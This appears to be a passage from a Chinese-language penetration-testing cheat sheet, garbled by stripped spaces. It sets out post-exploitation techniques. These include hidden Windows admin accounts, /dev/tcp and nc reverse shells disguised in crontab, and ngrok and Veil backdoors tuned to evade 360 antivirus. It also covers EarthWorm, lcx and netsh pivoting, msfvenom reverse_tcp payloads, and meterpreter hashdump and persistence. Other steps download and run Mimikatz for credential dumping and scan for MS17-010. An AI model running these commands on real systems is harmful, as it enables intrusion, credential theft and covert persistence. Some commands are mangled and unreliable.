-CreateProcess'cmd.exe'-Username'ntauthority\system'adduser并隱藏:IEX(New-ObjectNet.WebClient).DownloadString('https://raw.githubuse/3gstudent/Windows-User-Clone/master/Windows-User-Clone.ps1')winserver有密碼強(qiáng)度要求，改為更復(fù)雜密碼即可:滲透技巧——Windows系統(tǒng)的帳戶隱藏https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%B8%90%E6%88%B7%E9%9A%90%E8%97%8F/windows的RDP連接記錄:http://rcoil.me/2018/05/%E5%85%B3%E4%BA%8Ewindows%E7%9A%84RDP%E8%BF%9E%E6%8E%A5%E8%AE%B0%E5%BD%95/linuxbashbash-i>&/dev/tcp//80800>&1`bash-i`交互的shell`&`標(biāo)準(zhǔn)錯(cuò)誤輸出到標(biāo)準(zhǔn)輸出`/dev/tcp/10001/8080`建立socketipport`0&1`標(biāo)準(zhǔn)輸入到標(biāo)準(zhǔn)輸出(crontab-l;echo'*/60****exec9<>/dev/tcp/IP/port;exec0<&9;exec1>&92>&1;/bin/bash--noprofile-i')|crontab-猥瑣版(crontab-l;printf"*/60****exec9<>/dev/tcp/IP/PORT;exec0<&9;exec1>&92>&1;/bin/bash--noprofile-i;\rnocrontabforwhoami%100c\n")|crontab-詳細(xì)介紹/tom0li/security_circle/blob/master/15288418585142.mdngrok-backdoorGrokbackdoor是一個(gè)簡單的基于python的后門，它使用Ngrok隧道進(jìn)行通信。Ngrok后門可以使用Pyinstaller生成windowslinux和mac二進(jìn)制文件。雖然免殺，但如果開win防火墻會(huì)提示，生成后門時(shí)會(huì)詢問是否捆綁ngrok，選擇no時(shí)，在被攻擊機(jī)執(zhí)行時(shí)需聯(lián)網(wǎng)下載ngrok，運(yùn)行后，telnet連接即可./deepzec/Grok-backdoorveil這里，安裝問題有點(diǎn)多，我用kali201832安裝成功，先安裝下列依賴，后按照官方即可。apt-getinstalllibncurses5*apt-getinstalllibavutil55*apt-getinstallgcc-mingw-w64*apt-getinstallwine32生成shell./Veil.pyuse1usec/meterpreter/rev_tcp在win用mingw下gcc編譯bypass360gccovexevclws2_32使用之前生成的veilrcmsfconsolerveilrc一句話開啟http服務(wù)，虛擬機(jī)里開啟，在外訪問虛擬機(jī)ip即可下載虛擬機(jī)文件：`python-mSimpleHTTPServer80`ewtools:http://rootkitercom/EarthWorm新版tools：/Termite/**正向***被攻擊機(jī)(跳板)：temp目錄下:unzipew.zipfile/sbin/init(查看linux位數(shù))chmod755ew_for_Linux./ew_for_Linuxsssocksdl9999(偵聽00009999netstatpantu|grep9999(查看是否偵聽成功)*攻擊機(jī)*proxychain設(shè)置socks5為跳板ipportproxychainnmap即可以用跳板代理掃描其他主機(jī)**反向***攻擊機(jī)*chmod777./ew_for_linux64./ew_for_linuxsrcsocksl1080e2333即被攻擊機(jī)連接本機(jī)2333端口，轉(zhuǎn)發(fā)到本機(jī)的1080端口，訪問本機(jī)的1080端口，相當(dāng)訪問被攻擊機(jī)的2333設(shè)置proxychainsocks5本主機(jī)ipport1080proxychain代理即可*被攻擊機(jī)*chmod777ew_for_linux./ew_for_Linux32-srssocks-d00-e2333ncnc簡單使用https://tom0ligithubio/2017/05/06/nc/linuxroot權(quán)限mknod/tmp/backpipep/bin/sh0/tmp/backpipe|ncipport1/tmp/backpipe權(quán)限不夠用`mkfifo/tmp/backpipe`以上用nc監(jiān)聽即可lcx被攻擊機(jī)lcx.exe-slave888853389vpslcx.exe–listen88885555在本機(jī)mstsc登陸1391235555或在vps連接1270015555netshwin自帶(只支持tcp)360攔將本地8019216811018080netsh interface portproxy add v4tov4 listenport=80connectaddress=01connectport=8080通過連接1111018082端口，相當(dāng)連接111101可訪問的內(nèi)網(wǎng)19216821023389netsh interface portproxy add v4tov4 listenaddress=01listenport=8082connectaddress=02connectport=3389go+msf&py+msfbypass360msf編碼生成后，用:gobuildldflags="Hwindowsguisw"即可，詳細(xì)參考以下link/metasploit-payload-bypass-av-note//2017/04/20/msf-AntiVirus.html提權(quán)win提權(quán)輔助工具，原理主要通過systeminfo補(bǔ)丁信息比對漏洞庫,工具鏈接https://githubcom/GDSSecurity/WindowsExploitSuggester/linux提權(quán)輔助https://githubcom/jondonas/linuxexploitsuggester2感謝前輩收集的提權(quán)exp:windowskernelexploitsWindows平臺(tái)提權(quán)漏洞集合https://githubcom/SecWiki/windowskernelexploitslinuxkernelexploitsLinux平臺(tái)提權(quán)漏洞集合https://githubcom/SecWiki/linuxkernelexploitsmsflinux相關(guān)payload：linux/x86/meterpreter/reverse_tcplinux/x86/meterpreter/bind_tcplinux/x86/shell_bind_tcplinux/x86/shell_reverse_tcplinux/x64/shell/bind_tcplinux/x64/shell/reverse_tcplinux/x64/shell_bind_tcplinux/x64/shell_bind_tcp_random_portlinux/x64/shell_reverse_tcpwindows相關(guān)payload:windows/meterpreter/reverse_tcpwindows/meterpreter/bind_tcpwindows/meterpreter/reverse_hop_httpwindows/meterpreter/reverse_httpwindows/meterpreter/reverse_http_proxy_pstorewindows/meterpreter/reverse_httpswindows/meterpreter/reverse_https_proxywindows/shell_reverse_tcpwindows/shell_bind_tcpwindows/x64/meterpreter/reverse_tcpwindows/x64/meterpreter/bind_tcpwindows/x64/shell_reverse_tcpwindows/x64/shell_bind_tcp目標(biāo)服務(wù)器為64位用x64監(jiān)聽，反彈meterpreter用含有meterpreter的模塊，反彈普通的shell（nc）shell_reverse_tcp模塊監(jiān)聽,例如msf:反彈shellmsfvenom -a x86 --platform windows -windows/meterpreter/reverse_tcpLHOST=LPORT=-fexe>shell.exe監(jiān)聽:windows/meterpreter/reverse_tcp反彈shellnc-ecmd.exeipport監(jiān)聽windows/shell_reverse_tcpmeterpreter下上傳uploadfile下載downloadfileMsf進(jìn)程注入(測試win10沒成功,win2008可以，360會(huì)攔)meterpreter>getuidmeterpreter>getpidmeterpreter>psmeterpreter>migrate676Msfhashmeterpreter>runhashdump sysmeterpreter>runpost/windows/gather/smart_hashdump 需要sys限getsystem存在uac，用msfbypass，但特征明顯meterpreter>searchbypassuacmsfpowerdumploadmimikatz不太好用Msf的持續(xù)后門**Persistence:**`runpersistenceh`用于創(chuàng)建啟動(dòng)項(xiàng)啟動(dòng)，會(huì)創(chuàng)建注冊表，創(chuàng)建文件。（X86_Linux不支持此腳本）runpersistence-U-i10-p10390-rfree.ngrok.cc會(huì)被360攔，-i1010秒請求一次,使用powershell執(zhí)行也被監(jiān)控而被360攔截meterpreter的`rungetgui-e`命令可以開啟成功。360會(huì)提示阻止`Runmetsvc-h`：用于創(chuàng)建服務(wù)，會(huì)創(chuàng)建meterpreter服務(wù)，并上傳三個(gè)文件，使用-r參數(shù)可以卸載服務(wù)，被攔Msfpowershellmeterpreter>loadpowershellmeterpreter>powershell_shellPS>IEX(New-ObjectNet.WebClient).DownloadString('https://raw.git/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Ps>Invoke-Mimikatz-DumpCredsMsfRouter2個(gè)或多個(gè)路由之間，沒有配置相應(yīng)的路由表，不能訪問，獲得一臺(tái)機(jī)器shellsession添加路由，使msf可以在當(dāng)前shellsession下以被攻擊機(jī)訪問其他內(nèi)網(wǎng)主機(jī)，meterpreter>runget_local_subnetsmeterpreter>runautoroute-s/16添加路由meterpreter>runautoroute-p查看路由meterpreter>runautoroute-d-s/16刪除MS17-010meterpreter>backgroundmsfexploit(multi/handler)>useauxiliary/scanner/smb/smb_ms17_010msfauxiliary(scanner/smb/smb_ms17_010)>setrhosts/24msfauxiliary(scanner/smb/smb_ms17_010)>setthreads50msfauxiliary(scanner/smb/smb_ms17_010)>run先利用`exploit/windows/smb/ms17_010_psexec`win10舊版依舊可以，新版設(shè)置smbusersmbpass即可Msf掃描經(jīng)過上面設(shè)置路由即可使用以下scan：useauxiliary/scanner/por